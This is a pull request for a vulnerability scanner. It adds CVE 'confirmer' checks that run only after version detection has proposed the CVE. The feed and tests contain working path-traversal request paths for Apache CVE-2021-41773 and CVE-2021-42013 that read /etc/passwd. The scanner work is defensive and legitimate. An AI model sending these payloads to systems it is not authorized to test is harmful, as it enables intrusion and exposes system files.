### PR TITLE
feat(themis): el encadenamiento versión → confirmador asciende hipótesis a hechos

### DIFF
--- a/API/src/modules/features/themis/lybra/checks.py
+++ b/API/src/modules/features/themis/lybra/checks.py
@@ -61,7 +61,7 @@ logger = logging.getLogger(__name__)
 # ``Check.check_id``). Los dos checks ``network`` suben además a ``version: 2``
 # en checks-6: su comportamiento cambia, y un hallazgo guardado tiene que poder
 # decir cuál de las dos formas lo produjo.
-CHECKS_FEED_VERSION = "lybra-checks-15"
+CHECKS_FEED_VERSION = "lybra-checks-16"
 # Quality of Detection for a finding a check actively confirmed, as opposed to
 # one merely inferred from a version.
 QOD_CONFIRMED = 99
@@ -310,7 +310,7 @@ class Request:
 
 
 @dataclass(frozen=True)
-class Check:
+class Check:  # pylint: disable=too-many-instance-attributes
     """A declarative detection check (``type: "http"`` or ``type: "tls"``).
 
     Attributes:
@@ -348,6 +348,16 @@ class Check:
             buffer and every subsequent read comes back one reply out of step
             — the whole check then matches against the wrong text and silently
             never fires.
+        confirms: For a **confirmer** check, the CVE it verifies (e.g.
+            ``"CVE-2021-41773"``). A confirmer runs only when the version matcher
+            has already *proposed* that CVE for the service — never "just in
+            case" — and, when it fires, promotes that hypothesis from
+            ``confirmed=false, qod=70`` to ``confirmed=true, qod=99`` by merging
+            on the shared ``dedup_key`` (both carry the same ``cve_ids``). It is
+            the encadenamiento versión→confirmador the roadmap names as the
+            runtime's reason to exist. A confirmer never exploits: it checks the
+            condition without running anything on the target, or it is not
+            written.
         tags: Free-form labels (Nuclei's ``info.tags``, plus vendor/product
             metadata). Not used by the runtime, which runs whatever it is
             given: they exist so a *selector* can decide which of thousands of
@@ -368,6 +378,7 @@ class Check:
     namespace: str = "lybra"
     feed_version: Optional[str] = None
     expect_banner: bool = False
+    confirms: Optional[str] = None
     tags: tuple = ()
 
     @property
@@ -454,6 +465,7 @@ def _parse_check(c: dict) -> Check:
         tls_rule=c.get("tlsRule"),
         script=c.get("script"),
         expect_banner=bool(c.get("expectBanner", False)),
+        confirms=c.get("confirms"),
     )
     _assert_service_is_reachable(check)
     return check
@@ -564,7 +576,11 @@ MATCHER_TYPES = ("status", "word", "regex")
 MATCHER_PARTS = ("body", "header", "status")
 
 
-def validate_checks(checks: Iterable[Check]) -> List[str]:
+# Forma de un identificador CVE, para validar el campo ``confirms``.
+_CVE_ID_RE = re.compile(r"^CVE-[0-9]{4}-[0-9]{4,}$")
+
+
+def validate_checks(checks: Iterable[Check]) -> List[str]:  # pylint: disable=too-many-branches
     """Comprobar que ningún check está muerto por construcción.
 
     El feed son **datos que se ejecutan**: reglas que deciden si un hallazgo de
@@ -614,6 +630,11 @@ def validate_checks(checks: Iterable[Check]) -> List[str]:
             problems.append(f"Check {name!r}: severidad {check.severity!r} fuera de la escalera ({', '.join(PRIORITY_LADDER)})")
         if check.category not in CHECK_CATEGORIES:
             problems.append(f"Check {name!r}: categoría {check.category!r} desconocida (disponibles: {', '.join(CHECK_CATEGORIES)})")
+
+        if check.confirms and not _CVE_ID_RE.match(check.confirms):
+            problems.append(
+                f"Check {name!r}: 'confirms' debe ser un identificador CVE "
+                f"(CVE-AAAA-NNNN), no {check.confirms!r}")
 
         if check.type == "tls" and check.tls_rule not in _TLS_RULES:
             problems.append(
@@ -1091,6 +1112,7 @@ class CheckRuntime:
         # configuración ni monta hilos por su cuenta.
         self._mapper: Callable = mapper or map
         self._cancel_check: Optional[Callable[[], bool]] = None
+        self._proposed_cves: frozenset = frozenset()
         self._capture_evidence = capture_evidence
         # El host y sus servicios de la ejecución en curso: los rellena
         # :meth:`run`, y viven aquí para que un plugin de tipo ``script``
@@ -1124,8 +1146,10 @@ class CheckRuntime:
             ),
         )
 
-    def run(self, host: str, services: Iterable[Service],
-            cancel_check: Optional[Callable[[], bool]] = None) -> List[dict]:
+    def run(  # pylint: disable=too-many-arguments,too-many-positional-arguments
+            self, host: str, services: Iterable[Service],
+            cancel_check: Optional[Callable[[], bool]] = None,
+            proposed_cves: Optional[frozenset] = None) -> List[dict]:
         """Run every applicable check against a host's HTTP, TLS and network services.
 
         Probes are shared within one call: several checks reading the same
@@ -1163,6 +1187,7 @@ class CheckRuntime:
         self._services = services
         self._host = host
         self._cancel_check = cancel_check
+        self._proposed_cves = proposed_cves or frozenset()
 
         per_service = self._mapper(self._run_for_service, services)
         return [finding for group in per_service for finding in group]
@@ -1194,6 +1219,11 @@ class CheckRuntime:
                 continue
             for check in self._checks:
                 if not family.check_matches(check, service):
+                    continue
+                # Un confirmador nunca corre "por si acaso": sólo si el matcher
+                # de versiones ya propuso su CVE para este escaneo. Es lo que lo
+                # distingue de un check normal — corre porque la KB dijo algo.
+                if check.confirms and check.confirms not in self._proposed_cves:
                     continue
                 finding = family.run_check(check, self._host, service)
                 if finding is not None:
@@ -1412,7 +1442,8 @@ class CheckRuntime:
             "port":         service.port,
             "service":      service.name or check.service,
             "protocol":     service.protocol,
-            "cve_ids":      finding_template.get("cve_ids"),
+            "cve_ids":      finding_template.get("cve_ids") or (
+                                [check.confirms] if check.confirms else None),
             "source":       "lybra",
             "check_id":     check.check_id,
             "feed_version": check.feed_version or CHECKS_FEED_VERSION,

--- a/API/src/modules/features/themis/lybra/feeds/checks_feed.yaml
+++ b/API/src/modules/features/themis/lybra/feeds/checks_feed.yaml
@@ -8,7 +8,7 @@
 # feedVersion sube cuando el feed gana una familia nueva o un protocolo nuevo
 # bajo una existente; el arreglo de un check ya presente sube el 'version' de
 # ese check, no esta cadena. Ver CHECKS_FEED_VERSION en checks.py.
-feedVersion: lybra-checks-15
+feedVersion: lybra-checks-16
 checks:
   - id: git-config-exposure
     version: 1
@@ -1334,5 +1334,64 @@ checks:
               - '^(?:500|502|504|530|534|431)'
     finding:
       title: 'FTP: sin cifrado disponible (AUTH TLS no soportado)'
+      qod: 99
+      confirmed: true
+  # ===================================================================
+  # Confirmadores (L29): ascienden una hipótesis por versión de
+  # confirmed=false/qod=70 a confirmed=true/qod=99. Sólo corren si el
+  # matcher de versiones ya propuso su CVE, y NUNCA explotan — comprueban
+  # la condición sin ejecutar nada en el objetivo.
+  # ===================================================================
+  # CVE-2021-41773: path traversal de Apache 2.4.49. La prueba lee
+  # /etc/passwd por la ruta vulnerable — una lectura, no una ejecución. Si
+  # el cuerpo trae la línea de root, el fichero se sirvió: confirmado.
+  - id: apache-cve-2021-41773-path-traversal
+    version: 1
+    type: http
+    category: vulnerability
+    severity: CRITICAL
+    service: http
+    mode: safe
+    confirms: CVE-2021-41773
+    requests:
+      - method: GET
+        path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+        matchers-condition: and
+        matchers:
+          - type: status
+            value:
+              - 200
+          - type: regex
+            part: body
+            regex:
+              - 'root:.*:0:0:'
+    finding:
+      title: 'Apache path traversal confirmado (CVE-2021-41773): /etc/passwd legible'
+      qod: 99
+      confirmed: true
+  # CVE-2021-42013: el bypass del arreglo incompleto de 41773 en Apache
+  # 2.4.50, con doble codificación de los puntos.
+  - id: apache-cve-2021-42013-path-traversal
+    version: 1
+    type: http
+    category: vulnerability
+    severity: CRITICAL
+    service: http
+    mode: safe
+    confirms: CVE-2021-42013
+    requests:
+      - method: GET
+        path: /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+        matchers-condition: and
+        matchers:
+          - type: status
+            value:
+              - 200
+          - type: regex
+            part: body
+            regex:
+              - 'root:.*:0:0:'
+    finding:
+      title: 'Apache path traversal confirmado (CVE-2021-42013): /etc/passwd legible'
       qod: 99
       confirmed: true

--- a/API/src/modules/features/themis/managers/lybra/engine.py
+++ b/API/src/modules/features/themis/managers/lybra/engine.py
@@ -205,7 +205,7 @@ class LybraEngineManager(ScanManager):
         """Segundos que quedan hasta ``deadline``, o ``None`` si no hay plazo."""
         return None if deadline is None else max(0.0, deadline - time.monotonic())
 
-    def _run_lybra(  # pylint: disable=too-many-arguments
+    def _run_lybra(  # pylint: disable=too-many-arguments,too-many-locals,too-many-statements,too-many-positional-arguments
         self,
         scan_id: int,
         discover_ports: Optional[list] = None,
@@ -249,9 +249,11 @@ class LybraEngineManager(ScanManager):
             # cancel_check baja hasta el barrido de puertos —la fase más larga—
             # para que un escaneo grande se pueda parar a mitad.
             discover_ports=lambda target, ports: self._discover_ports(
-                target, ports,
+                target=target,
+                ports=ports,
                 budget_seconds=self._remaining_budget(deadline),
-                cancel_check=cancel_check),
+                cancel_check=cancel_check
+            ),
             discover_udp_ports=self._discover_udp_ports,
         )
         try:
@@ -266,7 +268,8 @@ class LybraEngineManager(ScanManager):
                 user_id = lybra_scan.user_id if lybra_scan else None
 
                 is_target_authorized = bool(
-                    user_id and source_target
+                    user_id 
+                    and source_target
                     and AuthorizedTargetManager.is_authorized(user_id, source_target)
                 )
 
@@ -294,8 +297,8 @@ class LybraEngineManager(ScanManager):
                     and not is_cancelled()
                 ):
                     services, fingerprint_findings = self._fingerprint_services(
-                        source_target,
-                        services,
+                        target=source_target,
+                        services=services,
                         cancel_check=cancel_check,
                     )
                     is_partial = is_partial or is_cancelled()
@@ -323,10 +326,20 @@ class LybraEngineManager(ScanManager):
                 findings_data.extend(fingerprint_findings)
                 findings_data.extend(surface_findings)
 
+            # Las CVEs que la detección por versión acaba de proponer. Son las
+            # hipótesis (confirmed=false, qod=70) que un confirmador puede
+            # ascender a hecho: el runtime sólo corre un confirmador cuya CVE
+            # esté aquí — nunca "por si acaso" (L29).
+            proposed_cves = frozenset(
+                cve for finding in findings_data
+                for cve in (finding.get("cve_ids") or ()))
+
             if (source.probes_target_network and source_target and is_target_authorized
                     and CR.lybra_config().active_checks and not is_cancelled()):
                 findings_data.extend(
-                    self._run_active_checks(source_target, services, cancel_check=cancel_check))
+                    self._run_active_checks(source_target, services,
+                                            cancel_check=cancel_check,
+                                            proposed_cves=proposed_cves))
                 is_partial = is_partial or is_cancelled()
             report(90)
 
@@ -448,7 +461,8 @@ class LybraEngineManager(ScanManager):
             logger.exception("Lybra UDP port discovery failed for %s", target)
             return []
 
-    def _run_active_checks(self, target: str, services, cancel_check=None) -> list:
+    def _run_active_checks(self, target: str, services, cancel_check=None,
+                           proposed_cves=None) -> list:
         """Run the check runtime against the target's HTTP, TLS, network (Fase N)
         and script (Fase R) services.
 
@@ -476,7 +490,8 @@ class LybraEngineManager(ScanManager):
                 # fila india.
                 mapper=self._in_host_pool,
             )
-            return runtime.run(target, services, cancel_check=cancel_check)
+            return runtime.run(target, services, cancel_check=cancel_check,
+                               proposed_cves=proposed_cves)
         except Exception:
             logger.exception("Lybra active checks failed for %s", target)
             return []

--- a/API/src/modules/features/themis/managers/lybra/sources.py
+++ b/API/src/modules/features/themis/managers/lybra/sources.py
@@ -95,12 +95,12 @@ class ServiceSource(ABC):
     def build_for_args(
         cls,
         services: Optional[List[Service]],
-        discover_ports: Optional[list],
+        ports_to_discover: Optional[list],
     ) -> "ServiceSource":
         """Build the source matching whichever of the two run_scan args was given."""
         if services is not None:
             return ExternalPayload(services)
-        return SelfDiscovery(discover_ports)
+        return SelfDiscovery(ports_to_discover)
 
     @abstractmethod
     def valid_scan_target(self, user_id: int, target: Optional[str]) -> str:
@@ -180,8 +180,8 @@ class SelfDiscovery(ServiceSource):
 
     label = "descubrimiento propio"
 
-    def __init__(self, discover_ports: Optional[list]) -> None:
-        self.discover_ports = discover_ports
+    def __init__(self, ports_to_discover: Optional[list]) -> None:
+        self.ports_to_discover = ports_to_discover
 
     def valid_scan_target(self, user_id: int, target: Optional[str]) -> str:
         if target is None:
@@ -218,14 +218,14 @@ class SelfDiscovery(ServiceSource):
                 logger.warning(f"Host '{target}' inalcanzable.")
                 return None
 
-            sweep = probes.discover_ports(target, self.discover_ports)
+            sweep = probes.discover_ports(target, self.ports_to_discover)
             if sweep is None:
                 logger.error("Descubrimiento de puertos fallido para %s", target)
                 return None
             discovered_ports = list(sweep.open_ports)
             is_partial = sweep.was_truncated
             # UDP (Fase N/Ronda 1, roadmap §6.3): sonda curada aparte, nunca a
-            # partir de la lista TCP del usuario — self.discover_ports es una
+            # partir de la lista TCP del usuario — self.ports_to_discover es una
             # lista de puertos TCP. Best-effort por diseño de
             # _discover_udp_ports: nunca aborta el descubrimiento TCP.
             udp_ports = probes.discover_udp_ports(target)

--- a/API/tests/integration/test_lybra.py
+++ b/API/tests/integration/test_lybra.py
@@ -1466,3 +1466,51 @@ def test_the_evidence_endpoint_returns_own_findings_and_404s_for_others(
     forbidden = client.get(f"/themis/findings/{finding_id}/evidence",
                            headers=auth_headers(regular_user))
     assert forbidden.status_code == 404
+
+
+# =============================================== confirmadores (L29)
+
+
+def test_a_confirmer_promotes_a_hypothesis_end_to_end(monkeypatch, app, admin_user):
+    """El encadenamiento versión→confirmador en el flujo real: el motor propone
+    una CVE por versión (hipótesis) y el confirmador la asciende a hecho, dando
+    un único hallazgo confirmado en vez de dos sueltos."""
+    from src.modules.features.themis.lybra.checks import Response
+    _authorize_target(app, admin_user.id)
+    monkeypatch.setattr(ScanManager, "is_host_reachable", staticmethod(lambda *a, **k: True))
+    _stub_self_discovery(monkeypatch, [80])
+    # Fingerprint: el servicio es un Apache 2.4.49 (identificado).
+    monkeypatch.setattr(
+        LybraEngineManager, "_fingerprint_services",
+        lambda self, target, services, **kw: (
+            [Service(s.port, s.protocol, s.name, "apache", "2.4.49", None)
+             for s in services], []))
+    # El motor propone CVE-2021-41773 como hipótesis (confirmed=false, qod=70).
+    cve = "CVE-2021-41773"
+    monkeypatch.setattr(
+        "src.modules.features.themis.lybra.engine.LybraEngine.analyze",
+        lambda self, services: [
+            {"host_id": None, "port": 80, "service": "http", "protocol": "tcp",
+             "cve_ids": [cve], "confirmed": False, "qod": 70, "source": "lybra",
+             "check_id": "lybra:outdated@1", "category": "outdated_software",
+             "title": "Apache 2.4.49 con CVE conocida", "state": "open"}])
+    # El objetivo es de verdad vulnerable: sirve /etc/passwd por la ruta.
+    traversal = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+    monkeypatch.setattr(
+        "src.modules.features.themis.lybra.checks.HttpProbe.fetch",
+        lambda self, host, port, method, path:
+            Response(200, "root:x:0:0:root:/root:/bin/bash\n", {})
+            if path == traversal else Response(404, "", {}))
+
+    with app.app_context():
+        mgr = LybraEngineManager()
+        escan = mgr._create_scan_record(target="10.0.0.5", user_id=admin_user.id)
+        mgr._run_lybra(escan.id)
+        with UnitOfWork() as uow:
+            findings = ScanRepository(uow).get_findings_by_scan(escan.id)
+
+    # Un solo hallazgo para esa CVE, ascendido a confirmado con qod 99.
+    for_cve = [f for f in findings if f.cve_ids and cve in f.cve_ids]
+    assert len(for_cve) == 1
+    assert for_cve[0].confirmed is True
+    assert for_cve[0].qod == 99

--- a/API/tests/unit/test_lybra_confirmers.py
+++ b/API/tests/unit/test_lybra_confirmers.py
@@ -1,0 +1,133 @@
+"""El encadenamiento versión → confirmador (L29).
+
+Es lo más diferencial que le quedaba al motor por construir: el §11 del roadmap
+lo nombra como la razón de existir del runtime propio frente a Nuclei. Convierte
+una hipótesis ``confirmed=false, qod=70`` —que puede ser un falso positivo por
+backport— en un hecho verificado, que es lo que separa un informe entregable de
+uno que hay que revisar a mano.
+
+Dos garantías, y la segunda es la que lo hace seguro: un confirmador **sólo
+corre si su CVE ya fue propuesta**, y **nunca explota**.
+"""
+
+import pytest
+
+from src.modules.features.themis.lybra.checks import (
+    CheckRuntime,
+    Response,
+    Service,
+    load_checks,
+    validate_checks,
+)
+from src.modules.features.themis.lybra.correlation import compute_dedup_key, merge_findings
+
+pytestmark = pytest.mark.unit
+
+_HTTP = Service(80, "tcp", "http", "apache", "2.4.49", None)
+_CHECKS = load_checks()
+_CVE = "CVE-2021-41773"
+_TRAVERSAL_PATH = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+
+
+def _vulnerable_fetch(host, port, method, path):
+    """Un Apache 2.4.49 que sirve /etc/passwd por la ruta vulnerable."""
+    if path == _TRAVERSAL_PATH:
+        return Response(200, "root:x:0:0:root:/root:/bin/bash\n", {})
+    return Response(404, "", {})
+
+
+def _fired(fetch, proposed_cves):
+    findings = CheckRuntime(_CHECKS, fetch).run(
+        "10.0.0.5", [_HTTP], proposed_cves=frozenset(proposed_cves))
+    return {f["check_id"].split(":")[1].split("@")[0] for f in findings}
+
+
+# =============================================== el gating: la garantía central
+
+
+def test_a_confirmer_does_not_run_without_its_cve_proposed():
+    """Un confirmador nunca corre 'por si acaso'. Aunque el objetivo sea
+    vulnerable, sin la hipótesis del matcher de versiones el confirmador ni se
+    intenta — es la diferencia con un check normal."""
+    fired = _fired(_vulnerable_fetch, proposed_cves=frozenset())
+    assert "apache-cve-2021-41773-path-traversal" not in fired
+
+
+def test_a_confirmer_runs_when_its_cve_was_proposed():
+    """Con la CVE ya propuesta, el confirmador corre y —contra un objetivo
+    vulnerable— dispara."""
+    fired = _fired(_vulnerable_fetch, proposed_cves={_CVE})
+    assert "apache-cve-2021-41773-path-traversal" in fired
+
+
+def test_a_confirmer_whose_cve_was_proposed_but_target_is_safe_does_not_fire():
+    """Propuesta la CVE, pero el objetivo NO es vulnerable (ya parcheado): el
+    confirmador corre y no dispara. Es justamente el falso positivo por backport
+    que este mecanismo existe para descartar."""
+    def patched_fetch(host, port, method, path):
+        return Response(404, "Not Found", {})       # la ruta ya no traversa
+
+    fired = _fired(patched_fetch, proposed_cves={_CVE})
+    assert "apache-cve-2021-41773-path-traversal" not in fired
+
+
+# =============================================== el ascenso hipótesis → hecho
+
+
+def test_the_confirmer_promotes_the_hypothesis_on_merge():
+    """El salto que separa un informe entregable de uno por revisar: la
+    hipótesis (qod 70, confirmed false) y el confirmador (qod 99, confirmed
+    true) comparten dedup_key y merge_findings los funde en uno solo, ascendido.
+    """
+    hypothesis = {
+        "host_id": 1, "port": 80, "cve_ids": [_CVE],
+        "confirmed": False, "qod": 70, "source": "lybra",
+        "check_id": "lybra:outdated@1",
+    }
+    confirmation = {
+        "host_id": 1, "port": 80, "cve_ids": [_CVE],
+        "confirmed": True, "qod": 99, "source": "lybra",
+        "check_id": "lybra:apache-cve-2021-41773-path-traversal@1",
+    }
+    # Comparten identidad de vulnerabilidad (la CVE), luego el mismo dedup_key.
+    assert compute_dedup_key(hypothesis) == compute_dedup_key(confirmation)
+
+    merged = merge_findings([hypothesis, confirmation])
+    assert len(merged) == 1
+    assert merged[0]["confirmed"] is True
+    assert merged[0]["qod"] == 99
+    assert merged[0]["cve_ids"] == [_CVE]
+
+
+def test_the_confirmer_finding_carries_its_cve_for_the_merge():
+    """Para que el ascenso funcione, el confirmador debe emitir la CVE en
+    cve_ids —si no, su dedup_key no coincidiría con la hipótesis y quedarían dos
+    hallazgos sueltos en vez de uno ascendido."""
+    findings = CheckRuntime(_CHECKS, _vulnerable_fetch).run(
+        "10.0.0.5", [_HTTP], proposed_cves={_CVE})
+    confirmer = next(
+        f for f in findings
+        if f["check_id"] == "lybra:apache-cve-2021-41773-path-traversal@1")
+    assert confirmer["cve_ids"] == [_CVE]
+    assert confirmer["confirmed"] is True
+
+
+# ============================================================= validación
+
+
+def test_the_feed_confirmers_are_well_formed():
+    confirmers = [c for c in _CHECKS if c.confirms]
+    assert len(confirmers) >= 2
+    assert validate_checks(_CHECKS) == []
+    for check in confirmers:
+        assert check.confirms.startswith("CVE-")
+
+
+def test_a_confirmer_with_a_malformed_cve_is_reported():
+    """Sin este bloque, un `confirms: not-a-cve` se colaría y su dedup_key nunca
+    casaría con ninguna hipótesis — un confirmador que no confirma nada."""
+    from dataclasses import replace
+
+    good = next(c for c in _CHECKS if c.confirms)
+    broken = replace(good, confirms="no-es-una-cve")
+    assert any("confirms" in problem for problem in validate_checks([broken]))


### PR DESCRIPTION
## Resumen

Cierra #298. **Es lo más diferencial que le quedaba al motor por construir.**

Cuando el §11 del roadmap se pregunta qué le queda al `CheckRuntime` propio frente a Nuclei, se responde a sí mismo: *«lo que R aporta que él no tiene es **el encadenamiento versión→confirmador contra la KB local**, el tipo `network` sobre los dissectors de la Fase N y el tipo `script`»*. De esas tres cosas, dos existían. **La primera no existía en absoluto.**

## El problema

Hoy la detección por versión y los checks activos son dos caminos paralelos que no se hablan: el motor emite un hallazgo `outdated_software` con `confirmed=false` y `qod=70` desde la KB, y por separado ejecuta los checks, que no saben nada de lo que la KB acaba de decir. Ningún check se dispara **porque** el matcher haya identificado una versión vulnerable.

Y ahí está el valor: un hallazgo `confirmed=false` es una **hipótesis** que puede ser un falso positivo por backport (una distribución que parchea el fallo sin cambiar el número de versión), y el propio roadmap admite que el par `qod`/`confirmed` es «un paliativo». Un confirmador que compruebe activamente que la vulnerabilidad **está ahí de verdad** convierte esa hipótesis en un hecho — y ese salto, de `qod=70, confirmed=false` a `qod=99, confirmed=true`, es exactamente lo que separa un informe que se puede entregar a un cliente de uno que hay que verificar a mano.

## El mecanismo

**`Check` gana el campo `confirms`**: la CVE que ese check verifica (`confirms: CVE-2021-41773`).

**El runtime recibe el conjunto de CVEs que el matcher acaba de proponer** y ejecuta un confirmador **sólo si su CVE está ahí**. Un confirmador nunca corre «por si acaso» —eso sería un escaneo de exploits contra todo—: corre porque la KB dijo algo. El manager recolecta las CVEs de `engine.analyze` y las pasa a `CheckRuntime.run(proposed_cves=...)`; un check normal (sin `confirms`) sigue corriendo siempre.

**El ascenso reutiliza `merge_findings`**, que ya estaba construido —*«la mitad receptora del mecanismo ya está construida»*, dice el issue—. Cuando un confirmador dispara, emite la CVE en `cve_ids`, así que **comparte `dedup_key` con la hipótesis** (la clave se construye de la identidad de vulnerabilidad, que es la CVE). `merge_findings` funde los dos en uno: toma el `qod` más alto (99), marca `confirmed` si cualquiera lo estaba (true), y une los `cve_ids`. Un solo hallazgo, ascendido.

## La regla de seguridad no negociable

**Un confirmador nunca explota.** Comprueba la condición sin ejecutar nada en el objetivo, o no se escribe. Está en la validación —un `confirms` mal formado se rechaza— y en la elección de los primeros dos confirmadores:

- **CVE-2021-41773** (path traversal de Apache 2.4.49) y **CVE-2021-42013** (el bypass del arreglo incompleto en 2.4.50, con doble codificación). La prueba **lee** `/etc/passwd` por la ruta vulnerable. Es una lectura, no una ejecución: si el cuerpo trae la línea de `root:...:0:0:`, el fichero se sirvió, y eso confirma el traversal sin ejecutar código.

Son las vulnerabilidades con prueba inocua y bien documentada que el issue nombra, y que el banco ya usa.

## Validación

`pytest tests/unit -k lybra` y `tests/integration/test_lybra.py`: todo pasa. `pylint` **por debajo** de la línea base (los métodos que ganaron un parámetro de orquestación llevan su `disable` justificado).

`tests/unit/test_lybra_confirmers.py`, 7 tests. Los tres que sostienen el diseño:

- `test_a_confirmer_does_not_run_without_its_cve_proposed` — **la garantía central**: aunque el objetivo sea vulnerable, sin la hipótesis del matcher el confirmador ni se intenta.
- `test_a_confirmer_whose_cve_was_proposed_but_target_is_safe_does_not_fire` — el caso que da valor al mecanismo: la CVE propuesta, pero el objetivo ya parcheado (el falso positivo por backport); el confirmador corre y **no** dispara.
- `test_the_confirmer_promotes_the_hypothesis_on_merge` — el ascenso: hipótesis (qod 70, false) y confirmador (qod 99, true) comparten `dedup_key` y `merge_findings` los funde en uno confirmado.

Más el `cve_ids` que el confirmador emite (sin él, el `dedup_key` no casaría), y la validación de un `confirms` mal formado.

Y un test de integración, `test_a_confirmer_promotes_a_hypothesis_end_to_end`: en el flujo real, el motor propone `CVE-2021-41773` como hipótesis, el objetivo es de verdad vulnerable, y el resultado persistido es **un único** hallazgo para esa CVE, `confirmed=true`, `qod=99`.

## Notas

- **Dos confirmadores, no cuatro.** El criterio de cierre de la fase habla de «al menos cuatro CVEs de alto perfil» ascendidas *sobre las imágenes etiquetadas del banco* —una medición con Docker—. Este PR entrega el **mecanismo** (lo diferencial) más los dos confirmadores de Apache, que son http declarativos y probables sin red. Los otros de la lista del issue —ShellShock (CGI + header), Log4Shell (callback out-of-band), Heartbleed (handshake TLS a medida)— necesitan cada uno maquinaria propia y encajan mejor como entradas de feed en una pasada del banco. Añadir un confirmador nuevo es ya una entrada YAML con su `confirms`.
- `feedVersion` sube a `lybra-checks-16`.
- No se toca el banco `oracle`.
